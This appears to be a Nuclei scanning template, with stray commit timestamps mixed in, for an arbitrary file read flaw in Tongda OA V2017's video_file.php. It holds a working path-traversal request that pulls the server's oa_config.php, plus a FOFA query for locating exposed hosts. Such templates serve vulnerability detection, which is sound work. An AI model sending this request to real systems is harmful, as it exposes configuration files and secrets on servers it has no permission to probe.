2023-09-18 12:37:42 +00:00
id : tongda-video-file-read
2023-09-06 19:45:50 +00:00
info :
name : Tongda OA V2017 Video File - Arbitrary File Read
author : SleepingBag945
severity : medium
description : |
There is an arbitrary file reading vulnerability in Extreme OA video_file.php. An attacker can obtain sensitive files on the server through the vulnerability.
reference :
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2017%20video_file.php%20任意文件下载漏洞.html
metadata :
2023-10-14 11:27:55 +00:00
verified : true
2023-09-06 19:45:50 +00:00
max-request : 1
fofa-query : icon_hash="1967132225"
tags : tongda,lfi
http :
- method : GET
path :
- "{{BaseURL}}/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php"
matchers-condition : and
matchers :
- type : word
words :
- "$ROOT_PATH"
- "$ATTACH_PATH"
- type : status
status :
2023-10-14 11:27:55 +00:00
- 200
2023-10-20 11:41:13 +00:00
# digest: 490a0046304402203d491497c57e0e70a7266b53e860b9ed5af0df0ac64ec101644c39221cc2004702205268afb077d307842fefa4b8ac93cf269be3bdb7011060114dfdde10d52d3035:922c64590222798bb761d5b6d8e72950